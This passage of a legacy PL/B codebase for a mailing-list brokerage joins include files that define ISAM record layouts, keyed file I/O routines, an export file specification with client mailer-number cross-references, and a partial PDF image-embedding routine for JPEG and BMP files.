TRAP IOMssg Giving Error if IO
BRANCH BatchLOCK,Batch4L,Batch4R,Batch4N
Batch4L
FILEPI 1;BatchFILE
READ BatchFILE,SEQ;BatchVARS
RETURN
Batch4r
READLK BatchFILE,SEQ;BatchVARS
RETURN
Batch4N
READ BatchFILE,SEQ;BatchVARS
RETURN
...............................................................................
..
.. ENTRY POINT : BatchWRT
.. REQUIRED : 'BatchFLD'
.. RETURNED :
.. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
..
BatchWRT
BRANCH BatchFLAG,Batch5
CALL BatchOPEN
Batch5
TRAP IOMssg Giving Error if IO
FILEPI 1;BatchFLIST
WRITE BatchFLIST;BatchVARS
RETURN
...............................................................................
..
.. ENTRY POINT : BatchUPD
.. REQUIRED : A PREVIOUS KEY READ
.. RETURNED :
.. DESCRIPTION : KEY UPDATE Contact FILE
..
BatchUPD
BRANCH BatchFLAG,Batch6
CALL BatchOPEN
Batch6
TRAP IOMssg Giving Error if IO
FILEPI 1;BatchFLIST
UPDATE BatchFLIST;BatchVARS
RETURN
...............................................................................
..
.. ENTRY POINT : BatchDEL
.. REQUIRED : 'BatchFLD'
.. RETURNED :
.. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
..
BatchDEL
BRANCH BatchFLAG,Batch7
CALL BatchOPEN
Batch7
TRAP IOMssg Giving Error if IO
FILEPI 1;BatchFLIST
DELETE BatchFLIST
RETURN
..............................................................................
...............................................................................
..
.. ENTRY POINT : BatchOPEN
.. REQUIRED : 'BatchFLAG' 'BatchPATH'
.. RETURNED : 'BatchFLAG' SET TO '1' IF OPENNED
.. DESCRIPTION : OPEN NIN Contact FILE
.. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
..
BatchOPEN
TRAP BatchGONE IF IO
OPEN BatchFLIST
TRAPCLR IO
MOVE C1,BatchFLAG
RETURN
...............................................................................
BatchGONE
MOVE BatchNAME,FILENAME
CALL FILEGONE
..
...............................................................................
<file_sep>/include/ndatwdd.inc
******************************************************
* DATACARD WEB FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS DATACARD WEB FILE.
* KEEPS TRACK OF FILES CURRENTLY LOADED ON OUR WEBSITE
* DYNAMICALLY REFRESHED WEEKLY BY NDAT002W.PLS
* ****************************************************
.
. FILE: NINDATW
. LENGTH: 6
. COMPRESS: SPACE
. TYPE: ISAM,MANAGED
. INDEX KEY: 1-6
......................................................
......................................................
NDATWNAME DIM 8
NDATWNME1 INIT "NINDATW "
.
NDATWFLIST FILELIST
NDATWFILE IFILE KEYLEN=6,FIXED=20,Name="NINDATW.ISI|NINS1:502"
FILELISTEND
NDATWLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NDATWFLD DIM 6
NDATWFLAG FORM 1
NDATWPATH FORM 1
.
NDATWVARS LIST
NDATWLST DIM 6 1-6 ZERO FILLED KEY.
NDATWFILL DIM 14 7-20 FILLER.
LISTEND
<file_sep>/include/nmobdd.inc
.NMOBDD.INC CREATED 06MAY92
.17mar94 added brknum
.12may94 added new file by brk/mlr
* *****************************************************************************
.
. FILE: NINMOB - BALANCE RECORD FILE.
. LENGTH: 21
.COMPRESS: NONE
. TYPE: ISAM
. KEYS: 1) MLR,
. KEYS: 2) broker/mlr number
...............................................................................
NMOBFILE IFILE KEYLEN=4,FIXED=21,dup
NMOBFLE2 IFILE KEYLEN=8,FIXED=21,NoDup
NMOBNAME INIT "NINMOB "
.START PATCH 01/20/2005 ASH REPLACED LOGIC
.NMOBNME1 INIT "\\NINS1\e\data\index\NINMOB"
.NMOBNME2 INIT "\\NINS1\e\data\index\NINMOB2"
NMOBNME1 INIT "NINMOB|NINS1:502 "
NMOBNME2 INIT "NINMOB2|NINS1:502 "
.END PATCH 01/20/2005 ASH REPLACED LOGIC
NMOBFLAG FORM 1
NMObFLG2 FORM 1
NMObpath FORM 1
nmobfld dim 4
NmobMsgFlag Dim 1 if "N" suppress io messages See Nmobio.inc
NmobOkFlag Dim 1 Ninv0001 can set to yes so if No $ and trying code 96 - we return gracefully
Code96Ok Dim 1 see above
...............................................................................
.BALANCE RECORD
...............
mobvars list
nmobMLR DIM 4 1-4 CLIENT NUMBER "KEY".
nmobmCNT DIM 3 5-7 MAILER CONTACT NUMBER "KEY".
.MBILLTO DIM 1 8-8 MAILER BILL-TO NUMBER.
BALANCE FORM 7.2 9-17 AMOUNT ON ACCOUNT
nmobbrk dim 4 18-21 broker/consultant. "KEY"
Listend
...............................................................................
<file_sep>/include/NONODD.INC
..............................................................................
.
. NONODD INCLUSION
. NIN ORDER NOTES FILE DEFINITION
.
. FILE NAME : ORDNOTES
. REC LENGTH: 521 VARIABLE
. INDEX KEY : 1- (6 POSITION LIST ORDER #, DUPLICATES ALLOWED)
.
..............................................................................
.
. PATCH 1.2 DMS 13JUN2006 Replaced NLINEX vars with single NLINE VAR.
. Associated with nordtest patch "3.78.3"
. Also converted ordnotes file.
; PATCH 1.1 DMB 18JUN2005 Changed IP of File Manager
.START PATCH 1.2 REPLACE LOGIC
.NONOFILE IFILE KEYLEN=6,VAR=381
NONOFILE IFILE KEYLEN=6,VAR=521
.END PATCH 1.2 REPLACE LOGIC
.START PATCH 1/8/2003 ASH - ADDED TO FILE MANAGER
.NONONAME INIT "ORDNOTES "
.>Patch 1.1 Begin
.NONONAME INIT "ORDNOTES.isi|20.20.30.103:502"
NONONAME INIT "ORDNOTES.isi|NINS1:502"
.>Patch 1.1 End
.END PATCH 1/8/2003 ASH - ADDED TO FILE MANAGER
.
NONOFLD DIM 6
NONOFLAG FORM 1
******************************************************************************
.
.START PATCH 1.2 ADDED LOGIC
ORDNOTESVARS LIST
.END PATCH 1.2 ADDED LOGIC
NOTEKEY DIM 6 1-6 *LR NUMBER KEY.
NDATE DIM 8 7-14 *DATE OF NOTE. MMDDYYCC
NTIME DIM 4 15-18 *TIME OF NOTE HHMM
.START PATCH 1.2 REPLACED LOGIC
.NLINE1 DIM 60 19-78
.NLINE2 DIM 60 79-138
.NLINE3 DIM 60 139-198
.NLINE4 DIM 60 199-258
.NLINE5 DIM 60 259-318
.NLINE6 DIM 60 319-378
.NINITS DIM 3 379-381
NLINE DIM 500 19-518
NINITS DIM 3 519-521
.END PATCH 1.2 REPLACED LOGIC
.START PATCH 1.2 ADDED LOGIC
LISTEND
.END PATCH 1.2 ADDED LOGIC
.
<file_sep>/include/Nmlr2dd.INC
..............................................................................
.
. NMLR2DD INCLUSION
. NIN MAILER NOTES FILE DEFINITION
.
. FILE NAME : NINMLR2
. REC LENGTH: 754
. INDEX KEY : 1-4
.
.ASH 29DEC2000 - FILE CREATED
..............................................................................
.
NMLR2FILE IFILE KEYLEN=4,VAR=754,NODUPLICATES
.NMLR2NAME INIT "NINMLR2.ISI|20.20.30.103:502"
NMLR2NAME INIT "NINMLR2.ISI"
NMLR2FLD DIM 4
NMLR2FLAG FORM 1
nMLR2lock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NMLR2VARS list
MLR2MLR dim 4 1-4 MLR NUMBER
MLR2NOTES DIM 750 5-754 MLR NOTES
listend
<file_sep>/include/INTEGRAL.INC
FILE SPECS
*******************************************
***************LRFile.dat******************
*******************************************
Order Status 1 Text “0”=Live, “B”=Billed, “Q”=Cancelled Billed, “X”=Cancelled, “l”=LCR, “z”=Cancelled LCR, “p”=Pending, “x”=Cancelled Pending
Mailer Number 4 Numeric
LR Number (Key) 6 Numeric
List Number 6 Numeric
List Owner Number 4 Numeric
Mailer Purchase Order Number 12 Text
Order Quantity 9 Numeric
Mailer Key 12 Text
Return Date 8 Numeric
Mail Date 8 Numeric
Entire/Rent/Exchange Code 1 Numeric “1”=Entire, “2”=Exchange, “3”=Entire & Exchange
Order Net Quantity 9 Numeric
Order Campaign Number 6 Numeric
*Exchange Price per Thousand 5 Numeric
Return To Company Number 4 Numeric
NINCA Contact Code 2 Numeric
NINCA Caller Code 2 Numeric
Order Date 8 Numeric
Order Exchange Quantity 9 Numeric
Broker Number 4 Numeric
Broker Contact Number 3 Numeric
Net Name Percentage 2 Numeric
Net Price (Run Fee/Charge) 6 Decimal
Mailer Name 45 Text
Owner Name 25 Text
Broker Name 45 Text
Merge Percentage 10 Numeric Merge % Percentage for this LR
Last Merge % for Mlr/List 6 Numeric Merge % for LR with this Mlr/List with latest Order Date
LCR/Pending Order SubStatus Desc. 45 Text Will remain blank until LCRs/Pending Orders are sent to Integral
Gross Billed Quantity 8 Numeric
Net Merge Quantity 8 Numeric
Total Billed (AR) 10.2 Numeric (total of 13 bytes)
Base Price 5.2 Numeric
Select Price 5.2 Numeric If applicable
Price Calculator 20 Text "/m", "Flat", etc.
Select Number 4 Numeric Valid Number OR "XXXX" = keyed in Select OR "----" = Order placed before new Datacard logic
Select Name 75 Text
Test/Continuation Code 1 Numeric "1"=Test, "2"=Retest, " "=Continuation
*********************************************
***************ListFile.dat******************
*********************************************
List Number(Key) 6 Numeric
List Name 75 Text
Status 1 Text "W"=Withdrawn, "T"=Temporarily Withdrawn
Universe 9 Numeric
Gender Info 15 Text
Owner Number 4 Numeric
*********************************************
***************SelFile.dat******************
*********************************************
List Number(Key) 6 Numeric
Select Number (Key) 4 Unique Numeric Identifier
Select Name 75 Text
Select Quantity 10 Numeric
Select Price 5.2 Numeric (Total of 8 bytes)
If the record is a Base/Secondary Base or unassociated Select,
this field represents the total Select Price. If the record
does have an associated Base/Secondary Base, this field would need
to be added to the Select Price of the associated Base/Secondary Base
in order to achieve the correct total. It was done this way to allow
different print options.
Commission Flag 1 Numeric
Price Modifier 3 Numeric
Inactive Flag 1 Numeric '1' = Inactive Select
Select Status 1 Numeric '1' = Special (does not print), '2' = Office Use Only
Notes Flag 1 Numeric '1' = User should view Notes field in corresponding Datacard
Exchange Flag 1 Numeric ' ' of '0' = Exchange or Rent, '1' = Exchange Only, '2' = Rental Only
Base Association 4 Text 'BASE' = Base Select - 1 per Datacard
'SEC.' = Secondary Base Select - 0+ per Datacard
A 4 byte Numeric field in this location establishes this record as a Select
off of a Base/Secondary Base. That 4 byte number would be the corresponding
Select Number of a Base/Secondary Base record.
There is the possibility of no data in this location. This would pertain to a Select
that is independent of an associated Base/Secondary Base, but is not a Base/Secondary Base
itself.
Index Flag 4 Numeric Established Print/Display order of Select Records for a Datacard
Select Date 8 Numeric
Initials 3 Text
Filler 11 Text
*********************************************
***************TxtFile.dat******************
*********************************************
(Unique identifier starts at '1', allowing up to nine 500 byte records of Free TExt per Datacard.)
Datacard Number 6 Numeric
Text Number 1 Numeric
Text 500 Text
********************************************
***************PkgFile.dat******************
********************************************
(The following fields are mutually exclusive: )
(Master Package Indicator)
(Master Package Associaton Number)
(Note on Master Packages: A Master Package will have an Indicator value of "1",)
(and the Association Number will be cleared. Regular Packages may have a valid)
(Master Package Number in the Association Number field.)
Mailer Number(Key) 6 Numeric
Package Number(Key) 6 Numeric
Package Name 150 Text
Client Package ID 25 Text
Package Date 8 Numeric
Package Notes 500 Text
Master Package Indicator 1 Numeric
Master Package Association Number 6 Numeric
Filler 91 Text
Cross-Reference for New 6 byte Mailer Number
____________________
New Old
____________________
000619 0173 (TNC)
000811 0055 (USF)
000933 0193 (DCCC)
000861 0108 (EarchJustice)
001016 0308 (HRC)
000899 0153 (League of Cons.)
003948 4261 (21st Century)
002094 1921 (Witness)
000830 0075 (PFAW)
000843 0088 (EngenderHealth)
001173 0532 (OxFam)
001385 0808 (Amer. Rivers)
007754 8881 (WaterKeeper)
000590 0031 (AFT)
008218 9366 (Dean 4 Amer.)
004117 4450 (Ducks Unlim.)
000828 0073 (NOW)
008637 0276 (NGLTF)
000834 0079 (Int. Rescue)
000913 0170 (NWF)
001238 0620 (NPCA)
002859 3028 (Farm Sanctuary)
000929 0188 (Defenders of Wildlife)
001226 0601 (CARE)
001882 1604 (Special Olympics International)
001082 0400 (PETA)
000814 0059 (Kennedy for Senate)
009318 1443 (Committee for a Democratic Majority)
*********************************************
***************PkgPFile.dat******************
*********************************************
Mailer Number(Key) 6 Numeric
Package Number(Key) 6 Numeric
Price Date(Key) 8 Numeric
Package Print Price 6.2 Numeric (total of 9 bytes)
Package Postage Price 6.2 Numeric (total of 9 bytes)
Package Premium Price 6.2 Numeric (total of 9 bytes)
Package Total Price 8.2 Numeric (total of 10 bytes)
Price Notes 200 Text
Filler 97 Text
*********************************************
***************XRefFile.dat******************
*********************************************
List Number(Key) 6 Numeric
Mailer Number(Key) 6 Numeric
*********************************************
***************ExchFile.dat******************
*********************************************
(Note on Inactivated Date: This field will USUALLY contain valid data)
(if the Flag has a value of "I". Otherwise do not be surprised to garbage)
(in this field!)
Mailer1 Number(Key) 6 Numeric
Mailer2 Number(Key) 6 Numeric
Inactivated Date 8 Text** See Notes
Entry Number 5 Numeric
Flag 1 Text " "=normal, "I" = inactive
Mailer1 Usage 10 Numeric
Mailer2 Usage 10 Numeric
*********************************************
***************PrcFile.dat******************
*********************************************
(Additional Prices associated with an Order)
LR Number (Key) 6 Numeric
LR/LOL Code (Key) 1 Numeric
Additional Price Code (Key) 1 Text "A" = Fixed Fees
Additional Price Number (Key) 3 Numeric
Additional Price Amount 5.2 Numeric
Additional Price Text 46 Text
Additional Price Calculator 20 Text
*********************************************
***************PkgFile2.dat******************
*********************************************
LR Number (Key) 6 Numeric
Package Record Code (Key) 1 Numeric "1" = LR, "0" = LOL
Package Number 6 Numeric
Package Total Price 8.2 Numeric (total of 10 bytes)
*********************************************
***************ConFile.dat******************
*********************************************
Contact Number (Key) 2 Numeric
Contact Name 35 Text
Contact Phone Number 25 Text
Contact Port Number 3 Numeric
Team Number 2 Numeric (Not implemented)
Rights 1 Numeric (Not implemented)
Rights 2 40 Numeric (Not implemented)
Default Printer 1 Numeric
Caller/Planner 1 Numeric
<file_sep>/include/IncLdd.inc
..............................................................................
.
. IncLDD INCLUSION
. NIN Income report Data Descriptors
.
. FILE NAME : IncLists.dat
. REC LENGTH: 527 FIXED
. INDEX KEY : (1) 1-6 (List #)
.
.INcome by List data descriptor
.used for List management income reporting to Owners
.
.
.
IncLNAME INIT "IncLists.ISI|NINS1:502"
IncLFILE IFILE KEYLEN=6,FIXED=527
IncLFLD DIM 6
IncLFLAG FORM 1
INCLVARS LIST
INCList DIM 6 1-6
INCDATEBY DIM 1 7-7 'M' by Mail date, 'O' by Order date
INCLTYPE DIM 1 8-8 Basis 'C' Cash, 'I' Invoice
. 2 Records required if Both Cash & Accrual
LMONTH FORM 2 9-10 Fiscal Month '1-12'
IncREP1 DIM 1 11-11 Report option 1 Type 'M' Monthly, 'Q' Quarterly, 'V' Monthly with Variance
. 2 Records required if Both monthly & quarterly
IncREP2 DIM 1 12-12 Report option 2 report with projections 'Y' = Include Variance
IncREP3 DIM 1 13-13 Report option 3 Not used
IncLYEAR FORM 4 14-17 Beginning year for report (drop data prior to being our list)
IncRECIPIENT DIM 255 18-272 Email address of recipient
IncCOMMENTS DIM 255 273-527 not used
listend
<file_sep>/include/NSPEIO.INC
..............................................................................
.
. NSPEIO INCLUSION
. NIN ORDER 00/99/98 FILE DEFINITION
.
. FILE NAME : NINSPEC
. REC LENGTH: 288 COMP
. INDEX KEY : 1-2
. Last Update Added logic to thwart I44 errors for defunct Key values - forcing setting of OVER flag - ASH 5/20/04
. Last Update Added trap IO trap logic ASH May 11,1999
. Last update aDD nspelock DLH 10Jun98
..............................................................................
.
. ENTRY POINT : NSPEKEY
. REQUIRED : 'NSPEFLD'
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NSPEKEY
. Last Update Added logic to thwart I44 errors for defunct Key values - forcing setting of OVER flag - ASH 5/20/04
.START PATCH 5/20/2004 ADDED LOGIC - ASH
call Trim using NSPEFLD
if (NSPEFLD = "")
flagrestore "0001"
return
endif
.END PATCH 5/20/2004 ADDED LOGIC - ASH
BRANCH NSPEFLAG TO NSPE1
CALL NSPEOPEN
NSPE1 trap IOMssg giving Error if IO
branch nspelock of nspe1L,Nspe1R,Nspe1N
.default FIlepi's active
Nspe1L FILEPI 1;NSPEFILE
READ NSPEFILE,NSPEFLD;NSPEVARS
trapclr IO
RETURN
.with record locks . note file open must have had flag set
Nspe1R
READLK NSPEFILE,NSPEFLD;NSPEVARS
trapclr IO
RETURN
.No locks
Nspe1N
READ NSPEFILE,NSPEFLD;NSPEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPETST
. REQUIRED : MKEY
. RETURNED :
. DESCRIPTION : TEST KEY
.
NSPETST BRANCH NSPEFLAG TO NSPE2
CALL NSPEOPEN
NSPE2 trap IOMssg giving Error if IO
. FILEPI 1;NSPEFILE
READ NSPEFILE,NSPEFLD;STR1
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPEKS
. REQUIRED :
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : KEY SEQUENTIAL SPECIAL INSTRUCTION FILE READ
.
NSPEKS BRANCH NSPEFLAG TO NSPE3
CALL NSPEOPEN
NSPE3 trap IOMssg giving Error if IO
BRANCH NSPELOCK OF NSPE3L,NSPE3R,NSPE3N
NSPE3L FILEPI 1;NSPEFILE
READKS NSPEFILE;NSPEVARS
trapclr IO
RETURN
NSPE3R
READKSLK NSPEFILE;NSPEVARS
trapclr IO
RETURN
NSPE3N
READKS NSPEFILE;NSPEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPESEQ
. REQUIRED :
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : SEQUENTIAL SPECIAL INSTRUCTION FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NSPESEQ BRANCH NSPEFLAG TO NSPE4
CALL NSPEOPEN
NSPE4 trap IOMssg giving Error if IO
BRANCH NSPELOCK OF NSPE4L,NSPE4R,NSPE4N
NSPE4L FILEPI 1;NSPEFILE
READ NSPEFILE,SEQ;NSPEVARS
trapclr IO
RETURN
NSPE4R
READLK NSPEFILE,SEQ;NSPEVARS
trapclr IO
RETURN
NSPE4N
READ NSPEFILE,SEQ;NSPEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPEWRT
. REQUIRED : 'MKEY'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NSPEWRT BRANCH NSPEFLAG OF NSPE5
CALL NSPEOPEN
NSPE5 trap IOMssg giving Error if IO
BRANCH NSPELOCK TO NSPE5L,NSPE5R
NSPE5L FILEPI 1;NSPEFILE
WRITE NSPEFILE,NSPEFLD;*+,NSPEVARS
trapclr IO
RETURN
NSPE5R
WRITE NSPEFILE,NSPEFLD;*+,NSPEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPEDEL
. REQUIRED : 'MKEY'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NSPEDEL BRANCH NSPEFLAG TO NSPE7
CALL NSPEOPEn
NSPE7 trap IOMssg giving Error if IO
FILEPI 1;NSPEFILE
DELETE NSPEFILE,NSPEFLD
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPEOPEN
. REQUIRED : 'NSPEFLAG'
. RETURNED : 'NSPEFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN SPECIAL INSTRUCTION FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NSPEOPEN TRAP NSPEGONE IF IO
BRANCH NSPELOCK TO NSPEOPNL,NSPEOPNR
NSPEOPNL OPEN NSPEFILE,NSPENAME
TRAPCLR IO
MOVE C1 TO NSPEFLAG
RETURN
NSPEOPNR OPEN NSPEFILE,NSPENAME,LOCKMANUAL,SINGLE
TRAPCLR IO
MOVE C1 TO NSPEFLAG
RETURN
.
NSPEGONE MOVE NSPENAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/NCOUDD.INC
; Last change: JLO 1 Jul 96 8:35 am
* *****************************************************************************
* NAMES IN THE NEWS MASTER COUNTS FILE.
* *****************************************************************************
.
. FILE: TRIPLEXCOUNT
. LENGTH: 62
.COMPRESS: NONE
. TYPE: ISAM
. KEY: 1-14 CTLIST,CTRTYPE,CTSTYPE
...............................................................................
NCOUFILE IFILE KEYL=14
NCOUNAME INIT "TDMCOUNT"
NCOUFLD DIM 14
NCOUFLAG FORM 1
NCOUPATH FORM 1
*******************************************************************************
*COUNTSVAR - VARIABLE INCLUSION FOR COUNTS SYSTEM 19-MAY-87.
*******************************************************************************
* THERE ARE FOUR RECORD TYPES FOR EVERY LIST*
* 1. LIST NAME RECORD 1-RECORD OF THIS TYPE PER LIST.
* 2. SEX RECORD 1-RECORD OF THIS TYPE PER LIST.
* 3. SCF RECORD X-RECORDS IF THIS TYPE PER LIST (ONE FOR EVERY SCF THAT HAS
* NAMES.
* 4. DTT RECORD 1-RECORD OF THIS TYPE PER LIST.
* ******** LIST NAME TYPE *****************************************************
CTKEY DIM 14 REDEFINES CTLIST,CTRTYPE,CTSTYPE.
.
CTLIST DIM 8 1-8 KEY LIST NUMBER=00+NINCA LIST #.
CTRTYPE DIM 3 9-11 KEY RECORD TYPE='LID'
CTSTYPE DIM 3 12-14 KEY RECORD SUB TYPE='000'
CTLISTN DIM 48 15-62 LIST NAME
.
* ******** SEX RECORD TYPE ****************************************************
.CTLIST DIM 8 1-8 KEY LIST NUMBER=00+NINCA LIST #.
.CTRTYPE DIM 3 9-11 KEY RECORD TYPE='SEX'
.CTSTYPE DIM 3 12-14 KEY RECORD SUB TYPE='000'
CTMALE FORM 8 15-22 MALE COUNT
CTFEMALE FORM 8 23-30 FEMALE COUNT
CTDUAL FORM 8 31-38 DUAL COUNT
CTCOMP FORM 8 39-46 COMPANY COUNT
CTUNKN FORM 8 47-54 UNKNOWN COUNT
CTSEED FORM 8 55-62 SEED COUNT
* ******** SCF RECORD TYPE ****************************************************
.CTLIST DIM 8 1-8 KEY LIST NUMBER=00+NINCA LIST #.
.CTRTYPE DIM 3 9-11 KEY RECORD TYPE='SCF'
.CTSTYPE DIM 3 12-14 KEY RECORD SUB TYPE="001 TO 999'
.CTUNKN FORM 8 15-22 UNKNOWN COUNT
.CTFEMALE FORM 8 23-30 FEMALE COUNT
.CTMALE FORM 8 31-38 MALE COUNT
.CTDUAL FORM 8 39-46 DUAL COUNT
.CTCOMP FORM 8 47-54 COMPANY COUNT
CTTOTAL FORM 8 55-62 RECORD TOTAL
* ******** DTT RECORD TYPE ****************************************************
.CTLIST DIM 8 1-8 KEY LIST NUMBER=00+NINCA LIST #.
.CTRTYPE DIM 3 9-11 KEY RECORD TYPE='DTT'
.CTSTYPE DIM 3 12-14 KEY RECORD SUB TYPE='000'
CTDATE DIM 8 15-22 DATE COUNTS UPDATED
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.misc required vars.
LST INIT "LID"
SCF INIT "SCF"
SEX1 INIT "SEX"
ZIP INIT "ZIP"
DTT INIT "DTT"
<file_sep>/include/nord4dd.inc
..............................................................................
.
. nord4D3D INCLUSION
. NIN supplimental Pending order Approval/Clearance ORDER FILE DEFINITION
.
. FILE NAME : NInord4xxxxx???
. REC LENGTH: 26 FIXED
. INDEX KEY : (1) 1-6 (LR#)
.
. Release 1.3 DLH add "Waiting for Pricing Approval"
. PATCH 1.2 Changed IP of File Manager DMB 18JUN05
. Patch 1.1 Added file to File Manager ASH 07AUG01
.
.START PATCH 1.1 REPLACED LOGIC
.nord4NAME Init "NInord4"
.Patch 1.2 Begin
.nord4NAME Init "NInord4.ISI|20.20.30.103:502"
nord4NAME Init "NInord4.ISI|NINS1:502"
.Patch 1.2 End
.END PATCH 1.1 REPLACED LOGIC
nord4FILE IFILE KEYLEN=6,FIXED=26
nord4FLD DIM 6
nord4FLAG FORM 1
nord4PATH FORM 1
nord4lock form 1
.
.
ORd4VARS LIST
nord4lr DIM 6 001-006 ORDER LR
nord4STAT DIM 2 007-008 Pending STATUS:
. 0 OR " " = pending 5 = at serice bereau
. 1 = waiting for guar 6 = Denied
. 2 = waiting for brk call 7 = cancelled
. 3 = waiting for prepayment 8 = approved
. 4 = waiting for revision 9 = received
.10 = Accounting Hold 11 = 2nd Request
.12 = Revised Request 13 = Waiting for List Usage Agreement
.14 = Waiting for Sample 15 = Waiting for Counts
.begin patch 1.3
.16 = Waiting Pricing Approval
.end patch 1.3
nordpdte DIM 8 009-016 DATE entered ccyymmdd
.note actual order date changes to date approved (if approved)
nord4STA2 DIM 2 017-018 Clearance STATUS:
.see notes from sales
.
nord4Cdte DIM 8 019-026 DATE entered ccyymmdd
.note actual order date changes to date approved (if approved)
listend
* .......................................................................
<file_sep>/DEVELOP/Includes - why/pdfimg.inc
.
. pdf image support
.
. Aug 03 2011 added jpeg support
.
. support up to 100 unique images.
.
. Aug 11 2011 added jpeg
. Aug 11 2011 logic to preserve aspect ratio of original image
.
ImageFNames dim ^250(99)
ImageObjNum form 4(99)
ImageWidth integer 4(99)
ImageHeight integer 4(99)
ImageNum form 2
.
PDFImage FUNCTION
top form 5.2
bottom form 5.2
left form 5.2
right form 5.2
ImageFileName dim 250
ENTRY
.
. images are an Xobject that are basically resources to a page.
. They are then referenced in the page by the following within the data stream:
. q %save graphics state
. /Image1 Do %draw the image
. Q % restore graphics state
.
. this routine therefor has to generate the Xobject and the stream commands.
.
. Note to self...Page resources in the code above are currently not dynamic enough
.
. path Resources needs /XObject << /Image1 resnum subnum R >>
.
. resnum subnum obj
. <<
. /Type /XObject
. /Subtype /Image
. /Width {image width}
. /Height {image height}
. /ColorSpace /DeviceRGB
. /BitsPerComponent {1 2 4 8 16} % 8 = 24 bit image
. /Filter [ /DCTDecode ] %option used for JPEG images, not needed for BMP
. >>
. stream
. {image data}
. endstream
. endobj
.
BMPr RECORD
type integer 4
width integer 4
height integer 4
wb integer 4 //widthbytes
planes integer 2
bitspix integer 2
bits integer 4
recordend
fm10 form 10
BMPFileHdr RECORD
type dim 2 //"BM"
size integer 4
res integer 4
offbits integer 4
recordend
bmpi record
size integer 4
width integer 4
height integer 4
planes integer 2
bitcount integer 2
compres integer 4
szimg integer 4
xppm integer 4
yppm integer 4
clruse integer 4
clrimp integer 4
recordend
char2 dim 2
imgf FILE
strlen form 10
strdat dim ^
.
pdfpos record
width form 5.4
form 2 //??
form 2 //??
height form 5.4
horz form 5.4
vert form 5.4
recordend
.
PDFFilter DIM 22
tmp dim 250
jpghead record
tag integer 1
type integer 1
len dim 1(2) // fbo int 2
recordend
.
d2 dim 2
da5 dim 1(5)
tag integer 1,"0xff"
jpgtype integer 1,"0xd8"
sizetyp integer 1,"0xc0"
fpos integer 4
int2 integer 2
.
fscratch1 form 4.5
fscratch2 form 4.5
AspectI form 4.5
AspectO form 4.5
.
content dim 200
.
CALL CVTVUnit giving top using top
CALL CVTVUnit giving bottom using bottom
CALL CVTHUnit giving left using left
CALL CVTHUnit giving right using right
.
. ADD MarginT,top
. ADD MarginT,bottom
ADD MarginL,Left
Add MarginL,right
.
MOVE (Page(curpage).Height-top),pdfpos.vert //pagesize
MOVE left,pdfpos.horz
MOVE (bottom-top),pdfpos.height
MOVE (right-left),pdfpos.width
SUB pdfpos.height,pdfpos.vert // bottom up, not top down.
.
. check if we already have this image resource
.
SEARCH ImageFileName,ImageFNames(1),"99",ImageNum
IF NOT EQUAL
MOVE ImageFileName,tmp
LOWERCASE tmp
WHEREISLAST ".",tmp,strlen
RETURN if zero // unable to determine image type
RESET tmp,strlen
CHOP tmp
.
SWITCH tmp
CASE ".jpg"
NOBREAK
CASE ".jpeg"
MOVE "/Filter [ /DCTDecode ]",PDFFilter
clear fpos
OPEN imgf,ImageFileName
READ imgf,seq;*abson,jpghead;
if ( jpghead.tag != tag and jpghead.type != jpgtype )
close imgf
setflag zero // unsupported image type
return
endif
. jpeg header:
. FF nn tag type ( FF D8 is begin of file and has no size)
. xx xx tag size ( forward byte order )
. xxxxx data
.
. image dimensions are in tag
. FF C0
. 00 11
. 08
. hh ww height width
LOOP
ADD "2",fpos
REPOSIT imgf,fpos
READ imgf,seq;*abson,jpghead;
IF OVER
CLOSE imgf
SETFLAG ZERO
RETURN
ENDIF
BREAK If ( jpghead.tag = tag and jpghead.type = sizetyp )
PACK d2,jpghead.len(2),jpghead.len(1)
MOVE d2,int2
ADD int2,fpos
REPEAT
.
READ imgf,seq;*abson,da5;
PACK d2,da5(3),da5(2)
MOVE d2,int2
MOVE int2,BMPi.height
PACK d2,da5(5),da5(4)
MOVE d2,int2
MOVE int2,BMPi.width
.
READ imgf,EOF;;
FPOSIT imgf,strlen
REPOSIT imgf,fzero
DMAKE strdat,strlen
READ imgf,seq;*ABSON,strdat;
CLOSE imgf
CASE ".bmp" // bitmap
CLEAR PDFFilter
.
. get image data
.
OPEN imgf,ImageFileName
READ imgf,seq;*ABSON,BMPFileHdr;
READ imgf,seq;*ABSON,BMPI;
.
. calculate stream length for image data
.
CALC strlen=BMPFileHdr.size-BMPFileHdr.offbits
DMAKE strdat,strlen
.
. read the image data
.
REPOSIT imgf,BMPFileHdr.offbits
READ imgf,seq;*ABSON,strdat;
IF ( bmpi.bitcount = 16 or bmpi.bitcount = 32 )
CALL cvt24 using bmpi.bitcount,strdat
ENDIF
. convert to PDF stream
CALL BMP2PDF using strdat,BMPi.width,BMPi.height
.
DEFAULT
setflag zero // unsupported image type
RETURN
ENDSWITCH
.
. figure out image scaling and adjust size to prevent stretch
.
MOVE bmpi.width,fscratch1
MOVE bmpi.height,fscratch2
.
CALC aspecti = pdfpos.width / fscratch1
CALC aspecto = pdfpos.height / fscratch2
IF ( aspecti < aspecto )
MOVE (aspecti*fscratch2), pdfpos.height
ELSE
